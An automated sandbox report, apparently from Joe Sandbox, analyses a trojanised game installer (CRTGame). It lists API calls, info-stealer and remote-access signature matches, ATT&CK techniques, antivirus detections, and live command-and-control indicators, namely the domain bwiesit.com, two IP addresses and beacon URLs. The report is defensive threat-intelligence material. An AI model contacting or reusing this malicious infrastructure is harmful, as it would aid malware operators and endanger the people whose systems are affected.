                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpCode function: 1_2_00463880 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,1_2_00463880
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpCode function: 1_2_00461E78 FindFirstFileA,FindNextFileA,FindClose,1_2_00461E78
                  Source: C:\Users\user\Desktop\6hvZpn91O8.exeCode function: 0_2_00409B30 GetSystemInfo,VirtualQuery,VirtualProtect,VirtualProtect,VirtualQuery,0_2_00409B30
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeThread delayed: delay time: 60000Jump to behavior
                  Source: crtgame.exe, 00000006.00000002.2938924611.0000000000807000.00000004.00000020.00020000.00000000.sdmp, crtgame.exe, 00000006.00000002.2938924611.0000000000883000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: C:\Users\user\Desktop\6hvZpn91O8.exeAPI call chain: ExitProcess graph end nodegraph_0-6728
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeAPI call chain: ExitProcess graph end nodegraph_4-2159
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeAPI call chain: ExitProcess graph end nodegraph_4-2399
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: 6_2_02C3FBBE RtlEncodePointer,RtlEncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,IsDebuggerPresent,OutputDebugStringW,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,6_2_02C3FBBE
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: 6_2_02C3FBBE RtlEncodePointer,RtlEncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,IsDebuggerPresent,OutputDebugStringW,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,6_2_02C3FBBE
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpCode function: 1_2_0044C030 LoadLibraryA,GetProcAddress,GetProcAddress,1_2_0044C030
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: 6_2_02C25F14 RtlInitializeCriticalSection,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetTickCount,GetVersionExA,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,GetProcessHeap,GetProcessHeap,RtlAllocateHeap,RtlAllocateHeap,GetProcessHeap,RtlAllocateHeap,GetProcessHeap,RtlAllocateHeap,RtlEnterCriticalSection,RtlLeaveCriticalSection,_malloc,_malloc,_malloc,_malloc,QueryPerformanceCounter,Sleep,_malloc,_malloc,Sleep,RtlEnterCriticalSection,RtlLeaveCriticalSection,GetTickCount,wsprintfA,InternetOpenA,InternetSetOptionA,InternetSetOptionA,InternetSetOptionA,InternetOpenUrlA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,RtlEnterCriticalSection,RtlLeaveCriticalSection,_malloc,RtlEnterCriticalSection,RtlLeaveCriticalSection,_malloc,_strtok,_swscanf,_strtok,Sleep,RtlEnterCriticalSection,RtlLeaveCriticalSection,_sprintf,RtlEnterCriticalSection,RtlLeaveCriticalSection,_malloc,6_2_02C25F14
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: 6_2_02C38F28 SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_02C38F28
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpCode function: 1_2_00476FAC ShellExecuteEx,GetLastError,MsgWaitForMultipleObjects,GetExitCodeProcess,CloseHandle,1_2_00476FAC
                  Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 helpmsg 10Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpCode function: 1_2_0042DFC4 AllocateAndInitializeSid,GetVersion,GetModuleHandleA,GetProcAddress,CheckTokenMembership,GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,GetTokenInformation,EqualSid,CloseHandle,FreeSid,1_2_0042DFC4
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: 6_2_02C37A6D cpuid 6_2_02C37A6D
                  Source: C:\Users\user\Desktop\6hvZpn91O8.exeCode function: GetLocaleInfoA,0_2_004051FC
                  Source: C:\Users\user\Desktop\6hvZpn91O8.exeCode function: GetLocaleInfoA,0_2_00405248
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpCode function: GetLocaleInfoA,1_2_00408570
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpCode function: GetLocaleInfoA,1_2_004085BC
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpCode function: 1_2_00457CE8 GetTickCount,QueryPerformanceCounter,GetSystemTimeAsFileTime,GetCurrentProcessId,CreateNamedPipeA,GetLastError,CreateFileA,SetNamedPipeHandleState,CreateProcessA,CloseHandle,CloseHandle,1_2_00457CE8
                  Source: C:\Users\user\Desktop\6hvZpn91O8.exeCode function: 0_2_004026C4 GetSystemTime,0_2_004026C4
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpCode function: 1_2_00454AB8 GetUserNameA,1_2_00454AB8
                  Source: C:\Users\user\Desktop\6hvZpn91O8.exeCode function: 0_2_00405CE4 GetVersionExA,0_2_00405CE4
                  Source: C:\Windows\SysWOW64\schtasks.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
                  Source: C:\Windows\SysWOW64\schtasks.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct

                  Stealing of Sensitive Information

                  barindex
                  Source: Yara matchFile source: C:\Program Files (x86)\CRTGame\bin\x86\is-KCF1P.tmp, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\CRTGame\bin\x86\is-HASL7.tmp, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\CRTGame\bin\x86\is-5IVSF.tmp, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\CRTGame\bin\x86\is-UT0J0.tmp, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\CRTGame\bin\x86\is-FJ939.tmp, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\CRTGame\bin\x86\is-IG6J1.tmp, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\CRTGame\bin\x86\is-ONP9R.tmp, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\CRTGame\bin\x86\is-BDC3N.tmp, type: DROPPED
                  Source: Yara matchFile source: 00000006.00000002.2939863204.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.2939732261.0000000002B7F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: crtgame.exe PID: 2496, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Source: Yara matchFile source: C:\Program Files (x86)\CRTGame\bin\x86\is-KCF1P.tmp, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\CRTGame\bin\x86\is-HASL7.tmp, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\CRTGame\bin\x86\is-5IVSF.tmp, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\CRTGame\bin\x86\is-UT0J0.tmp, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\CRTGame\bin\x86\is-FJ939.tmp, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\CRTGame\bin\x86\is-IG6J1.tmp, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\CRTGame\bin\x86\is-ONP9R.tmp, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\CRTGame\bin\x86\is-BDC3N.tmp, type: DROPPED
                  Source: Yara matchFile source: 00000006.00000002.2939863204.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.2939732261.0000000002B7F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: crtgame.exe PID: 2496, type: MEMORYSTR
                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                  Windows Management Instrumentation
                  1
                  DLL Side-Loading
                  1
                  Exploitation for Privilege Escalation
                  1
                  Deobfuscate/Decode Files or Information
                  OS Credential Dumping1
                  System Time Discovery
                  Remote Services1
                  Archive Collected Data
                  2
                  Ingress Tool Transfer
                  Exfiltration Over Other Network Medium1
                  System Shutdown/Reboot
                  CredentialsDomainsDefault Accounts2
                  Native API
                  4
                  Windows Service
                  1
                  DLL Side-Loading
                  3
                  Obfuscated Files or Information
                  LSASS Memory1
                  Account Discovery
                  Remote Desktop ProtocolData from Removable Media2
                  Encrypted Channel
                  Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain Accounts1
                  Scheduled Task/Job
                  1
                  Scheduled Task/Job
                  1
                  Access Token Manipulation
                  23
                  Software Packing
                  Security Account Manager1
                  File and Directory Discovery
                  SMB/Windows Admin SharesData from Network Shared Drive1
                  Non-Standard Port
                  Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal Accounts2
                  Service Execution
                  1
                  Bootkit
                  4
                  Windows Service
                  1
                  DLL Side-Loading
                  NTDS35
                  System Information Discovery
                  Distributed Component Object ModelInput Capture2
                  Non-Application Layer Protocol
                  Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script12
                  Process Injection
                  1
                  Masquerading
                  LSA Secrets51
                  Security Software Discovery
                  SSHKeylogging112
                  Application Layer Protocol
                  Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts1
                  Scheduled Task/Job
                  21
                  Virtualization/Sandbox Evasion
                  Cached Domain Credentials21
                  Virtualization/Sandbox Evasion
                  VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                  Access Token Manipulation
                  DCSync11
                  Application Window Discovery
                  Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job12
                  Process Injection
                  Proc Filesystem3
                  System Owner/User Discovery
                  Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                  Bootkit
                  /etc/passwd and /etc/shadow1
                  Remote System Discovery
                  Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                  IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
                  System Network Configuration Discovery
                  Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 signatures2 2 Behavior Graph ID: 1575009 Sample: 6hvZpn91O8.exe Startdate: 14/12/2024 Architecture: WINDOWS Score: 100 49 Suricata IDS alerts for network traffic 2->49 51 Found malware configuration 2->51 53 Antivirus / Scanner detection for submitted sample 2->53 55 9 other signatures 2->55 8 6hvZpn91O8.exe 2 2->8         started        process3 file4 35 C:\Users\user\AppData\...\6hvZpn91O8.tmp, PE32 8->35 dropped 11 6hvZpn91O8.tmp 17 76 8->11         started        process5 file6 37 C:\Program Files (x86)\CRTGame\crtgame.exe, PE32 11->37 dropped 39 C:\Program Files (x86)\...\is-KCF1P.tmp, PE32 11->39 dropped 41 C:\Program Files (x86)\...\is-5IVSF.tmp, PE32 11->41 dropped 43 106 other files (none is malicious) 11->43 dropped 57 Uses schtasks.exe or at.exe to add and modify task schedules 11->57 15 crtgame.exe 1 15 11->15         started        18 schtasks.exe 1 11->18         started        20 net.exe 1 11->20         started        22 crtgame.exe 1 2 11->22         started        signatures7 process8 dnsIp9 45 bwiesit.com 94.232.249.187, 49736, 49737, 49740 INT-PDN-STE-ASSTEPDNInternalASSY Syrian Arab Republic 15->45 47 46.8.225.74, 2023, 49915 FIORD-ASIP-transitoperatorinRussiaUkraineandBaltics Russian Federation 15->47 25 conhost.exe 18->25         started        27 conhost.exe 18->27         started        29 conhost.exe 20->29         started        31 net1.exe 1 20->31         started        33 C:\ProgramData\SpaceXRaces\SpaceXRaces.exe, PE32 22->33 dropped file10 process11

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand
                  SourceDetectionScannerLabelLink
                  6hvZpn91O8.exe58%VirustotalBrowse
                  6hvZpn91O8.exe39%ReversingLabsWin32.Trojan.Munp
                  6hvZpn91O8.exe100%AviraHEUR/AGEN.1332570
                  SourceDetectionScannerLabelLink
                  C:\Program Files (x86)\CRTGame\bin\x86\7z.exe (copy)0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\OptimFROG.dll (copy)0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\avfilter-9.dll (copy)0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\avutil-58.dll (copy)0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\bass.dll (copy)3%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\bass_aac.dll (copy)3%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\bass_fx.dll (copy)0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\bass_ofr.dll (copy)0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\bass_tta.dll (copy)3%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\bassalac.dll (copy)3%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\bassape.dll (copy)0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\basscd.dll (copy)3%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\bassdsd.dll (copy)0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\bassflac.dll (copy)0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\bassmidi.dll (copy)0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\bassmix.dll (copy)0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\bassopus.dll (copy)3%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\basswma.dll (copy)0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\basswv.dll (copy)3%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\d_writer.dll (copy)0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\da.dll (copy)0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\daiso.dll (copy)0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\dsd2.dll (copy)0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\dsd2pcmt.dll (copy)0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\dstt.dll (copy)0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\ff_helper.dll (copy)0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\gain_analysis.dll (copy)0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\is-12J2O.tmp0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\is-2CG7G.tmp0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\is-2CGLR.tmp0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\is-2JPEP.tmp0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\is-4NPOS.tmp0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\is-58TJN.tmp0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\is-5IVSF.tmp3%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\is-640V1.tmp0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\is-65BJ1.tmp0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\is-6RB4E.tmp0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\is-73F5N.tmp0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\is-766CT.tmp0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\is-7Q436.tmp0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\is-849ND.tmp0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\is-AGPIJ.tmp0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\is-BDC3N.tmp3%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\is-BJBAO.tmp0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\is-C1CHO.tmp0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\is-C6CS8.tmp0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\is-DQCHN.tmp0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\is-F44SJ.tmp0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\is-FGLVG.tmp0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\is-FJ939.tmp0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\is-G7PIK.tmp0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\is-HAM7K.tmp0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\is-HASL7.tmp3%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\is-HS78I.tmp0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\is-IG6J1.tmp3%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\is-KANF7.tmp0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\is-KCF1P.tmp3%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\is-KPUSQ.tmp0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\is-ML5PH.tmp0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\is-NG6SA.tmp0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\is-NH7NT.tmp0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\is-OF8TE.tmp0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\is-OJ8GN.tmp0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\is-OMMAA.tmp0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\is-ONP9R.tmp3%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\is-PIVQ2.tmp0%ReversingLabs
                  No Antivirus matches
                  No Antivirus matches
                  SourceDetectionScannerLabelLink
                  bwiesit.com0%Avira URL Cloudsafe
                  http://94.232.249.187/click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde20%Avira URL Cloudsafe
                  https://mp4v2.googlecode.com/svnrepository0%Avira URL Cloudsafe
                  http://bwiesit.com/click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945cea4de0a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cadb5cbb220%Avira URL Cloudsafe
                  http://www.mp3dev.org/ID3Error0%Avira URL Cloudsafe
                  https://mp4v2.googlecode.com/svn/trunk0%Avira URL Cloudsafe
                  https://mp4v2.googlecode.com/svn/trunkrepository0%Avira URL Cloudsafe
                  http://www.mpg123.de0%Avira URL Cloudsafe
                  http://bwiesit.com/click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca0%Avira URL Cloudsafe
                  http://94.232.249.187/click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde20%Avira URL Cloudsafe
                  http://lame.sf.net0%Avira URL Cloudsafe
                  http://mingw-w64.sourceforge.net/X0%Avira URL Cloudsafe
                  http://LosslessAudio.org/00%Avira URL Cloudsafe
                  http://lame.sf.net32bits0%Avira URL Cloudsafe
                  https://mp4v2.googlecode.com/svn0%Avira URL Cloudsafe
                  http://ocsps.ssl.com0Q0%Avira URL Cloudsafe
                  http://www.mp3dev.org/0%Avira URL Cloudsafe
                  NameIPActiveMaliciousAntivirus DetectionReputation
                  bwiesit.com
                  94.232.249.187
                  truetrue
                    unknown
                    NameMaliciousAntivirus DetectionReputation
                    bwiesit.comtrue
                    • Avira URL Cloud: safe
                    unknown
                    http://bwiesit.com/click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945cea4de0a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cadb5cbb22true
                    • Avira URL Cloud: safe
                    unknown
                    http://bwiesit.com/click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919catrue
                    • Avira URL Cloud: safe
                    unknown
                    NameSourceMaliciousAntivirus DetectionReputation
                    http://www.innosetup.com/6hvZpn91O8.tmp, 6hvZpn91O8.tmp, 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, 6hvZpn91O8.tmp.0.dr, is-4264D.tmp.1.drfalse
                      high
                      https://gcc.gnu.org/bugs/):is-73F5N.tmp.1.drfalse
                        high
                        http://cert.ssl.com/SSLcom-SubCA-CodeSigning-RSA-4096-R1.cer0is-HS78I.tmp.1.dr, is-640V1.tmp.1.drfalse
                          high
                          https://mp4v2.googlecode.com/svn/trunkis-BJBAO.tmp.1.drfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://sectigo.com/CPS0is-58TJN.tmp.1.dr, is-V8IE4.tmp.1.drfalse
                            high
                            http://94.232.249.187/click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde2crtgame.exe, 00000006.00000002.2940328851.00000000036D2000.00000004.00000020.00020000.00000000.sdmp, crtgame.exe, 00000006.00000002.2938924611.000000000089F000.00000004.00000020.00020000.00000000.sdmp, crtgame.exe, 00000006.00000002.2938924611.0000000000867000.00000004.00000020.00020000.00000000.sdmp, crtgame.exe, 00000006.00000002.2938924611.00000000008C1000.00000004.00000020.00020000.00000000.sdmp, crtgame.exe, 00000006.00000002.2938924611.0000000000840000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://ocsp.sectigo.com0is-58TJN.tmp.1.dr, is-V8IE4.tmp.1.drfalse
                              high
                              http://www.mp3dev.org/ID3Erroris-HAM7K.tmp.1.drfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://mp4v2.googlecode.com/svnrepositoryis-BJBAO.tmp.1.drfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://ocsps.ssl.com0is-HS78I.tmp.1.dr, is-640V1.tmp.1.drfalse
                                high
                                http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0sis-58TJN.tmp.1.dr, is-V8IE4.tmp.1.drfalse
                                  high
                                  http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#is-58TJN.tmp.1.dr, is-V8IE4.tmp.1.drfalse
                                    high
                                    http://www.mpg123.deis-QECHS.tmp.1.drfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://mp4v2.googlecode.com/svn/trunkrepositoryis-BJBAO.tmp.1.drfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://crls.ssl.com/ssl.com-rsa-RootCA.crl0is-HS78I.tmp.1.dr, is-640V1.tmp.1.drfalse
                                      high
                                      http://94.232.249.187/click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde2crtgame.exe, 00000006.00000002.2938924611.00000000008C1000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.remobjects.com/psU6hvZpn91O8.exe, 00000000.00000003.1677333051.0000000002148000.00000004.00001000.00020000.00000000.sdmp, 6hvZpn91O8.exe, 00000000.00000003.1677127078.0000000002370000.00000004.00001000.00020000.00000000.sdmp, 6hvZpn91O8.tmp, 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, 6hvZpn91O8.tmp.0.dr, is-4264D.tmp.1.drfalse
                                        high
                                        http://lame.sf.netis-HAM7K.tmp.1.drfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://streams.videolan.org/upload/is-S02KC.tmp.1.drfalse
                                          high
                                          http://mingw-w64.sourceforge.net/Xis-2CGLR.tmp.1.drfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://www.ssl.com/repository0is-HS78I.tmp.1.dr, is-640V1.tmp.1.drfalse
                                            high
                                            http://LosslessAudio.org/0is-RNIE1.tmp.1.drfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://lame.sf.net32bitsis-HAM7K.tmp.1.drfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.mp3dev.org/is-HAM7K.tmp.1.drfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://code.google.com/p/mp4v2Dis-BJBAO.tmp.1.drfalse
                                              high
                                              http://www.remobjects.com/ps6hvZpn91O8.exe, 00000000.00000003.1677333051.0000000002148000.00000004.00001000.00020000.00000000.sdmp, 6hvZpn91O8.exe, 00000000.00000003.1677127078.0000000002370000.00000004.00001000.00020000.00000000.sdmp, 6hvZpn91O8.tmp, 6hvZpn91O8.tmp, 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, 6hvZpn91O8.tmp.0.dr, is-4264D.tmp.1.drfalse
                                                high
                                                https://mp4v2.googlecode.com/svnis-BJBAO.tmp.1.drfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://crls.ssl.com/SSLcom-SubCA-CodeSigning-RSA-4096-R1.crl0is-HS78I.tmp.1.dr, is-640V1.tmp.1.drfalse
                                                  high
                                                  http://ocsps.ssl.com0Qis-HS78I.tmp.1.dr, is-640V1.tmp.1.drfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.sqlite.org/copyright.html.is-G7PIK.tmp.1.drfalse
                                                    high
                                                    • No. of IPs < 25%
                                                    • 25% < No. of IPs < 50%
                                                    • 50% < No. of IPs < 75%
                                                    • 75% < No. of IPs
                                                    IPDomainCountryFlagASNASN NameMalicious
                                                    46.8.225.74
                                                    unknownRussian Federation
                                                    28917FIORD-ASIP-transitoperatorinRussiaUkraineandBalticsfalse
                                                    94.232.249.187
                                                    bwiesit.comSyrian Arab Republic
                                                    29256INT-PDN-STE-ASSTEPDNInternalASSYtrue
                                                    Joe Sandbox version:41.0.0 Charoite
                                                    Analysis ID:1575009
                                                    Start date and time:2024-12-14 03:06:09 +01:00
                                                    Joe Sandbox product:CloudBasic
                                                    Overall analysis duration:0h 6m 46s
                                                    Hypervisor based Inspection enabled:false
                                                    Report type:full
                                                    Cookbook file name:default.jbs
                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                    Number of analysed new started processes analysed:13
                                                    Number of new started drivers analysed:0
                                                    Number of existing processes analysed:0
                                                    Number of existing drivers analysed:0
                                                    Number of injected processes analysed:0
                                                    Technologies:
                                                    • HCA enabled
                                                    • EGA enabled
                                                    • AMSI enabled
                                                    Analysis Mode:default
                                                    Analysis stop reason:Timeout
                                                    Sample name:6hvZpn91O8.exe
                                                    renamed because original name is a hash value
                                                    Original Sample Name:1015b0b5cfddfbc4baea6910d9c56c3c.exe
                                                    Detection:MAL
                                                    Classification:mal100.troj.evad.winEXE@16/128@1/2
